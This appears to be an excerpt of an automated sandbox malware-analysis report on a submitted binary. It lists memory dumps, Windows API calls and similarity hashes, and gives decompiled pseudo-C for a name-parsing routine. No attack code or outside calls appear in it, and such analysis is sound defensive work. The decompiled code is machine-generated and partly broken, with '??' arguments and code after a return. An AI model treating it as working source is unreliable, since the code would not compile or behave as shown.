                                                                                                                                                                                                                                                                                                        0x0040c5b7
                                                                                                                                                                                                                                                                                                        0x0040c7e8
                                                                                                                                                                                                                                                                                                        0x0040c7e8
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c5b7
                                                                                                                                                                                                                                                                                                        0x0040c5ab
                                                                                                                                                                                                                                                                                                        0x0040c5af
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c700
                                                                                                                                                                                                                                                                                                        0x0040c702
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c708
                                                                                                                                                                                                                                                                                                        0x0040c596

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: strlen
                                                                                                                                                                                                                                                                                                        • String ID: Z$Z__$_$_$_GLOBAL_
                                                                                                                                                                                                                                                                                                        • API String ID: 39653677-4292778781
                                                                                                                                                                                                                                                                                                        • Opcode ID: 0ad0a61377d16953e720fc486ce5b331837087ab9875d8e2a4921e5e519b7121
                                                                                                                                                                                                                                                                                                        • Instruction ID: a41b7c460a24ac64f23146913b44c01de2d1fb22a8724b68d938b925d51e36d8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ad0a61377d16953e720fc486ce5b331837087ab9875d8e2a4921e5e519b7121
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 79513AB5D046299BDB20DF69C8843DEBBF1AF49304F4481AAD448BB381D7395A898F94
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                                                                                                                        • String ID: `'$h%$%
                                                                                                                                                                                                                                                                                                        • API String ID: 1294909896-1163342584
                                                                                                                                                                                                                                                                                                        • Opcode ID: 22739cb87aa6bf5ec0b8609a5980fe21be2e206d39622b15aafff76b155d4342
                                                                                                                                                                                                                                                                                                        • Instruction ID: 2671b0a13e0022686a5f159adedc0d204adf9fcc5b257b9fc773f72bb2b13b5b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 22739cb87aa6bf5ec0b8609a5980fe21be2e206d39622b15aafff76b155d4342
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7CD12BB0604306DFD720EF25D54435BBBE0AF80344F50883EE9859B361D7BD998ADB9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                                        			E0040C6FC(void* __eax, signed char* __ebx, signed int __ecx, signed int __edx) {
                                                                                                                                                                                                                                                                                                        				signed int _t81;
                                                                                                                                                                                                                                                                                                        				signed int _t82;
                                                                                                                                                                                                                                                                                                        				void* _t91;
                                                                                                                                                                                                                                                                                                        				signed int _t94;
                                                                                                                                                                                                                                                                                                        				signed char* _t99;
                                                                                                                                                                                                                                                                                                        				signed int _t104;
                                                                                                                                                                                                                                                                                                        				signed int _t116;
                                                                                                                                                                                                                                                                                                        				int _t117;
                                                                                                                                                                                                                                                                                                        				signed char* _t120;
                                                                                                                                                                                                                                                                                                        				signed char* _t122;
                                                                                                                                                                                                                                                                                                        				signed char* _t126;
                                                                                                                                                                                                                                                                                                        				signed char* _t127;
                                                                                                                                                                                                                                                                                                        				signed int _t130;
                                                                                                                                                                                                                                                                                                        				signed int _t131;
                                                                                                                                                                                                                                                                                                        				signed int _t132;
                                                                                                                                                                                                                                                                                                        				void* _t134;
                                                                                                                                                                                                                                                                                                        				signed int _t135;
                                                                                                                                                                                                                                                                                                        				signed int _t136;
                                                                                                                                                                                                                                                                                                        				signed char* _t150;
                                                                                                                                                                                                                                                                                                        				void* _t151;
                                                                                                                                                                                                                                                                                                        				signed char* _t156;
                                                                                                                                                                                                                                                                                                        				void* _t157;
                                                                                                                                                                                                                                                                                                        				signed char** _t159;
                                                                                                                                                                                                                                                                                                        				void* _t160;
                                                                                                                                                                                                                                                                                                        				signed char** _t161;
                                                                                                                                                                                                                                                                                                        				void* _t167;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t135 = __edx;
                                                                                                                                                                                                                                                                                                        				_t120 = __ebx;
                                                                                                                                                                                                                                                                                                        				if(__al == 0x24) {
                                                                                                                                                                                                                                                                                                        					_t81 = __ebx[9] & 0x000000ff;
                                                                                                                                                                                                                                                                                                        					_t3 = _t81 == 0x49;
                                                                                                                                                                                                                                                                                                        					_t130 = __ecx & 0xffffff00 | _t3;
                                                                                                                                                                                                                                                                                                        					if(_t3 == 0) {
                                                                                                                                                                                                                                                                                                        						L3:
                                                                                                                                                                                                                                                                                                        						_t151 = 0;
                                                                                                                                                                                                                                                                                                        						if(_t120[0xa] == 0x5f) {
                                                                                                                                                                                                                                                                                                        							_t151 = (_t130 << 0x1f >> 0x1f) + 3;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						_t151 = 0;
                                                                                                                                                                                                                                                                                                        						if(_t81 == 0x44) {
                                                                                                                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					L31:
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				 *_t159 = _t120;
                                                                                                                                                                                                                                                                                                        				 *(_t157 - 0x184) = _t135;
                                                                                                                                                                                                                                                                                                        				_t82 = strlen(??);
                                                                                                                                                                                                                                                                                                        				 *(_t157 - 0x170) = _t120;
                                                                                                                                                                                                                                                                                                        				 *(_t157 - 0x168) = 0x11;
                                                                                                                                                                                                                                                                                                        				 *(_t157 - 0x164) = _t120;
                                                                                                                                                                                                                                                                                                        				 *(_t157 - 0x15c) = 0;
                                                                                                                                                                                                                                                                                                        				 *(_t157 - 0x150) = 0;
                                                                                                                                                                                                                                                                                                        				_t131 = _t82;
                                                                                                                                                                                                                                                                                                        				 *(_t157 - 0x16c) =  &(_t120[_t82]);
                                                                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t157 - 0x158)) = _t131 + _t131;
                                                                                                                                                                                                                                                                                                        				 *(_t157 - 0x14c) = _t131;
                                                                                                                                                                                                                                                                                                        				 *(_t157 - 0x148) = 0;
                                                                                                                                                                                                                                                                                                        				 *(_t157 - 0x144) = 0;
                                                                                                                                                                                                                                                                                                        				 *(_t157 - 0x140) = 0;
                                                                                                                                                                                                                                                                                                        				_t160 = _t159 - E0040DB20(0x00000012 + (_t131 + _t131 + _t131 * 0x00000004) * 0x00000004 & 0xfffffff0);
                                                                                                                                                                                                                                                                                                        				_t91 = E0040DB20(0x00000012 + _t131 * 0x00000004 & 0xfffffff0);
                                                                                                                                                                                                                                                                                                        				_t136 =  *(_t157 - 0x184);
                                                                                                                                                                                                                                                                                                        				_t161 = _t160 - _t91;
                                                                                                                                                                                                                                                                                                        				_t167 = _t151 - 1;
                                                                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t157 - 0x160)) = _t160 + 0xc;
                                                                                                                                                                                                                                                                                                        				 *(_t157 - 0x154) =  &(_t161[3]);
                                                                                                                                                                                                                                                                                                        				if(_t167 == 0) {
                                                                                                                                                                                                                                                                                                        					_t132 = 0;
                                                                                                                                                                                                                                                                                                        					if(_t136 == 0x5f) {
                                                                                                                                                                                                                                                                                                        						_t136 = _t120[1] & 0x000000ff;
                                                                                                                                                                                                                                                                                                        						 *(_t157 - 0x164) =  &(_t120[1]);
                                                                                                                                                                                                                                                                                                        						if(_t136 == 0x5a) {
                                                                                                                                                                                                                                                                                                        							 *(_t157 - 0x164) =  &(_t120[2]);
                                                                                                                                                                                                                                                                                                        							_t124 = _t157 - 0x170;
                                                                                                                                                                                                                                                                                                        							_t132 = E00406810(_t157 - 0x170, 1);
                                                                                                                                                                                                                                                                                                        							if(( *(_t157 - 0x168) & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                                                        								while(1) {
                                                                                                                                                                                                                                                                                                        									_t156 =  *(_t157 - 0x164);
                                                                                                                                                                                                                                                                                                        									_t136 =  *_t156 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        									if(_t136 != 0x2e) {
                                                                                                                                                                                                                                                                                                        										goto L15;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									_t104 = _t156[1] & 0x000000ff;
                                                                                                                                                                                                                                                                                                        									_t77 = _t104 - 0x61; // -7
                                                                                                                                                                                                                                                                                                        									if(_t77 <= 0x19 || _t104 == 0x5f || _t104 - 0x30 <= 9) {
                                                                                                                                                                                                                                                                                                        										_t132 = E00405190(_t124, _t132);
                                                                                                                                                                                                                                                                                                        										continue;
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										_t136 =  *_t156 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									goto L15;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								_t136 =  *( *(_t157 - 0x164)) & 0x000000ff;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					if(_t167 < 0 || _t151 > 3) {
                                                                                                                                                                                                                                                                                                        						_t132 = E00405ED0(_t157 - 0x170);
                                                                                                                                                                                                                                                                                                        						_t136 =  *( *(_t157 - 0x164)) & 0x000000ff;
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						_t150 =  &(_t120[0xb]);
                                                                                                                                                                                                                                                                                                        						 *(_t157 - 0x164) = _t150;
                                                                                                                                                                                                                                                                                                        						if(_t120[0xb] != 0x5f || _t120[0xc] != 0x5a) {
                                                                                                                                                                                                                                                                                                        							 *_t161 = _t150;
                                                                                                                                                                                                                                                                                                        							_t125 = _t157 - 0x170;
                                                                                                                                                                                                                                                                                                        							_t134 = E00404FF0(_t157 - 0x170, strlen(??), _t150);
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							 *(_t157 - 0x164) =  &(_t120[0xd]);
                                                                                                                                                                                                                                                                                                        							_t125 = _t157 - 0x170;
                                                                                                                                                                                                                                                                                                        							_t134 = E00406810(_t157 - 0x170, 0);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						 *_t161 = 0;
                                                                                                                                                                                                                                                                                                        						_t116 = E00404F90(_t125, _t134, (0 | _t151 != 0x00000002) + 0x42);
                                                                                                                                                                                                                                                                                                        						_t126 =  *(_t157 - 0x164);
                                                                                                                                                                                                                                                                                                        						 *_t161 = _t126;
                                                                                                                                                                                                                                                                                                        						 *(_t157 - 0x184) = _t116;
                                                                                                                                                                                                                                                                                                        						_t117 = strlen(??);
                                                                                                                                                                                                                                                                                                        						_t132 =  *(_t157 - 0x184);
                                                                                                                                                                                                                                                                                                        						_t127 =  &(_t126[_t117]);
                                                                                                                                                                                                                                                                                                        						 *(_t157 - 0x164) = _t127;
                                                                                                                                                                                                                                                                                                        						_t136 =  *_t127 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				L15:
                                                                                                                                                                                                                                                                                                        				_t94 = 0;
                                                                                                                                                                                                                                                                                                        				if(_t136 == 0 && _t132 != 0) {
                                                                                                                                                                                                                                                                                                        					_t122 = _t157 - 0x13c;
                                                                                                                                                                                                                                                                                                        					 *(_t157 - 0x3c) = 0;
                                                                                                                                                                                                                                                                                                        					 *((char*)(_t157 - 0x38)) = 0;
                                                                                                                                                                                                                                                                                                        					 *(_t157 - 0x2c) = 0;
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t157 - 0x34)) =  *((intOrPtr*)(_t157 - 0x17c));
                                                                                                                                                                                                                                                                                                        					 *(_t157 - 0x28) = 0;
                                                                                                                                                                                                                                                                                                        					 *(_t157 - 0x20) = 0;
                                                                                                                                                                                                                                                                                                        					 *(_t157 - 0x1c) = 0;
                                                                                                                                                                                                                                                                                                        					 *(_t157 - 0x30) =  *(_t157 - 0x180);
                                                                                                                                                                                                                                                                                                        					 *(_t157 - 0x24) = 0;
                                                                                                                                                                                                                                                                                                        					E004079F0(_t122, _t132, 0x11);
                                                                                                                                                                                                                                                                                                        					_t99 =  *(_t157 - 0x3c);
                                                                                                                                                                                                                                                                                                        					 *_t161 = _t122;
                                                                                                                                                                                                                                                                                                        					 *((char*)(_t157 + _t99 - 0x13c)) = 0;
                                                                                                                                                                                                                                                                                                        					_t161[2] =  *(_t157 - 0x30);
                                                                                                                                                                                                                                                                                                        					_t161[1] = _t99;
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t157 - 0x34))();
                                                                                                                                                                                                                                                                                                        					_t94 = 0 |  *(_t157 - 0x24) == 0x00000000;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _t94;
                                                                                                                                                                                                                                                                                                        				goto L31;
                                                                                                                                                                                                                                                                                                        			}





























                                                                                                                                                                                                                                                                                                        0x0040c6fc
                                                                                                                                                                                                                                                                                                        0x0040c6fc
                                                                                                                                                                                                                                                                                                        0x0040c702
                                                                                                                                                                                                                                                                                                        0x0040c5a0
                                                                                                                                                                                                                                                                                                        0x0040c5a6
                                                                                                                                                                                                                                                                                                        0x0040c5a6
                                                                                                                                                                                                                                                                                                        0x0040c5a9
                                                                                                                                                                                                                                                                                                        0x0040c5b1
                                                                                                                                                                                                                                                                                                        0x0040c5b1
                                                                                                                                                                                                                                                                                                        0x0040c5b7
                                                                                                                                                                                                                                                                                                        0x0040c7e8
                                                                                                                                                                                                                                                                                                        0x0040c7e8
                                                                                                                                                                                                                                                                                                        0x0040c5ab
                                                                                                                                                                                                                                                                                                        0x0040c5ab
                                                                                                                                                                                                                                                                                                        0x0040c5af
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c5af
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c5a9
                                                                                                                                                                                                                                                                                                        0x0040c5c0
                                                                                                                                                                                                                                                                                                        0x0040c5c3
                                                                                                                                                                                                                                                                                                        0x0040c5c9
                                                                                                                                                                                                                                                                                                        0x0040c5ce
                                                                                                                                                                                                                                                                                                        0x0040c5d4
                                                                                                                                                                                                                                                                                                        0x0040c5de
                                                                                                                                                                                                                                                                                                        0x0040c5e4
                                                                                                                                                                                                                                                                                                        0x0040c5ee
                                                                                                                                                                                                                                                                                                        0x0040c5f8
                                                                                                                                                                                                                                                                                                        0x0040c5fd
                                                                                                                                                                                                                                                                                                        0x0040c606
                                                                                                                                                                                                                                                                                                        0x0040c619
                                                                                                                                                                                                                                                                                                        0x0040c61f
                                                                                                                                                                                                                                                                                                        0x0040c629
                                                                                                                                                                                                                                                                                                        0x0040c633
                                                                                                                                                                                                                                                                                                        0x0040c642
                                                                                                                                                                                                                                                                                                        0x0040c652
                                                                                                                                                                                                                                                                                                        0x0040c657
                                                                                                                                                                                                                                                                                                        0x0040c65d
                                                                                                                                                                                                                                                                                                        0x0040c65f
                                                                                                                                                                                                                                                                                                        0x0040c666
                                                                                                                                                                                                                                                                                                        0x0040c66c
                                                                                                                                                                                                                                                                                                        0x0040c672
                                                                                                                                                                                                                                                                                                        0x0040c725
                                                                                                                                                                                                                                                                                                        0x0040c72a
                                                                                                                                                                                                                                                                                                        0x0040c7f0
                                                                                                                                                                                                                                                                                                        0x0040c7f7
                                                                                                                                                                                                                                                                                                        0x0040c800
                                                                                                                                                                                                                                                                                                        0x0040c80e
                                                                                                                                                                                                                                                                                                        0x0040c814
                                                                                                                                                                                                                                                                                                        0x0040c828
                                                                                                                                                                                                                                                                                                        0x0040c82a
                                                                                                                                                                                                                                                                                                        0x0040c84b
                                                                                                                                                                                                                                                                                                        0x0040c84b
                                                                                                                                                                                                                                                                                                        0x0040c851
                                                                                                                                                                                                                                                                                                        0x0040c857
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c85d
                                                                                                                                                                                                                                                                                                        0x0040c861
                                                                                                                                                                                                                                                                                                        0x0040c867
                                                                                                                                                                                                                                                                                                        0x0040c849
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c874
                                                                                                                                                                                                                                                                                                        0x0040c874
                                                                                                                                                                                                                                                                                                        0x0040c874
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c867
                                                                                                                                                                                                                                                                                                        0x0040c82c
                                                                                                                                                                                                                                                                                                        0x0040c832
                                                                                                                                                                                                                                                                                                        0x0040c832
                                                                                                                                                                                                                                                                                                        0x0040c82a
                                                                                                                                                                                                                                                                                                        0x0040c800
                                                                                                                                                                                                                                                                                                        0x0040c678
                                                                                                                                                                                                                                                                                                        0x0040c678
                                                                                                                                                                                                                                                                                                        0x0040c7cb
                                                                                                                                                                                                                                                                                                        0x0040c7d3
                                                                                                                                                                                                                                                                                                        0x0040c687
                                                                                                                                                                                                                                                                                                        0x0040c68b
                                                                                                                                                                                                                                                                                                        0x0040c68e
                                                                                                                                                                                                                                                                                                        0x0040c694
                                                                                                                                                                                                                                                                                                        0x0040c6a0
                                                                                                                                                                                                                                                                                                        0x0040c6a3
                                                                                                                                                                                                                                                                                                        0x0040c6b9
                                                                                                                                                                                                                                                                                                        0x0040c880
                                                                                                                                                                                                                                                                                                        0x0040c885
                                                                                                                                                                                                                                                                                                        0x0040c88b
                                                                                                                                                                                                                                                                                                        0x0040c898
                                                                                                                                                                                                                                                                                                        0x0040c898
                                                                                                                                                                                                                                                                                                        0x0040c6c8
                                                                                                                                                                                                                                                                                                        0x0040c6cf
                                                                                                                                                                                                                                                                                                        0x0040c6d4
                                                                                                                                                                                                                                                                                                        0x0040c6da
                                                                                                                                                                                                                                                                                                        0x0040c6dd
                                                                                                                                                                                                                                                                                                        0x0040c6e3
                                                                                                                                                                                                                                                                                                        0x0040c6e8
                                                                                                                                                                                                                                                                                                        0x0040c6ee
                                                                                                                                                                                                                                                                                                        0x0040c6f0
                                                                                                                                                                                                                                                                                                        0x0040c6f6
                                                                                                                                                                                                                                                                                                        0x0040c6f6
                                                                                                                                                                                                                                                                                                        0x0040c678
                                                                                                                                                                                                                                                                                                        0x0040c730
                                                                                                                                                                                                                                                                                                        0x0040c730
                                                                                                                                                                                                                                                                                                        0x0040c734
                                                                                                                                                                                                                                                                                                        0x0040c740
                                                                                                                                                                                                                                                                                                        0x0040c74b
                                                                                                                                                                                                                                                                                                        0x0040c752
                                                                                                                                                                                                                                                                                                        0x0040c756
                                                                                                                                                                                                                                                                                                        0x0040c75d
                                                                                                                                                                                                                                                                                                        0x0040c766
                                                                                                                                                                                                                                                                                                        0x0040c76d
                                                                                                                                                                                                                                                                                                        0x0040c774
                                                                                                                                                                                                                                                                                                        0x0040c77b
                                                                                                                                                                                                                                                                                                        0x0040c780
                                                                                                                                                                                                                                                                                                        0x0040c787
                                                                                                                                                                                                                                                                                                        0x0040c78c
                                                                                                                                                                                                                                                                                                        0x0040c792
                                                                                                                                                                                                                                                                                                        0x0040c795
                                                                                                                                                                                                                                                                                                        0x0040c79d
                                                                                                                                                                                                                                                                                                        0x0040c7a1
                                                                                                                                                                                                                                                                                                        0x0040c7a5
                                                                                                                                                                                                                                                                                                        0x0040c7af
                                                                                                                                                                                                                                                                                                        0x0040c7af
                                                                                                                                                                                                                                                                                                        0x0040c7b9
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: strlen
                                                                                                                                                                                                                                                                                                        • String ID: Z$Z__$_$_
                                                                                                                                                                                                                                                                                                        • API String ID: 39653677-4277869324
                                                                                                                                                                                                                                                                                                        • Opcode ID: 93bc87d4a599b898b9007435da9f4fbf58381ce8c7af0ba03057e7bca5c2660f
                                                                                                                                                                                                                                                                                                        • Instruction ID: 8d7f502781d967d802a4aa3f964cc6313e810cf132c2305c106e04feedb735a0
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 93bc87d4a599b898b9007435da9f4fbf58381ce8c7af0ba03057e7bca5c2660f
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13511875D04619CBDB20DF69C8843DEBBF0AF49304F0481AAD448BB381DB399A898F85
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004102F0: TlsGetValue.KERNEL32 ref: 0041033E
                                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,004122C1), ref: 00411F47
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00411F74
                                                                                                                                                                                                                                                                                                        • _endthreadex.MSVCRT(00000000,00000000,?,?,?,?,?,?,?,?,?,004122C1), ref: 00411F8B
                                                                                                                                                                                                                                                                                                        • longjmp.MSVCRT(?,?,?,?,?,?,?,?,004122C1), ref: 00411FA6
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,004122C1), ref: 00411FB7
                                                                                                                                                                                                                                                                                                        • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,004122C1), ref: 00411FE4
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00411FFE
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseHandleValue$_endthreadexlongjmp
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3990644698-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 56178e2ac8600d964766aa628ca786a291f8a3ac5a68369e8f71b7c128b74622
                                                                                                                                                                                                                                                                                                        • Instruction ID: 4e6f2f2bca7cf614c94cf5b6cd3d36f82834035e84155aea1445addecb616fae
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 56178e2ac8600d964766aa628ca786a291f8a3ac5a68369e8f71b7c128b74622
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4313EB0204301DFD711AF65D98879A7FE4AF04348F45886EEA458F362D778D886CB9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 53%
                                                                                                                                                                                                                                                                                                        			E0400A090(signed int __eax, intOrPtr _a4, signed short _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                                                                                                                                                        				signed char _v8;
                                                                                                                                                                                                                                                                                                        				short _v12;
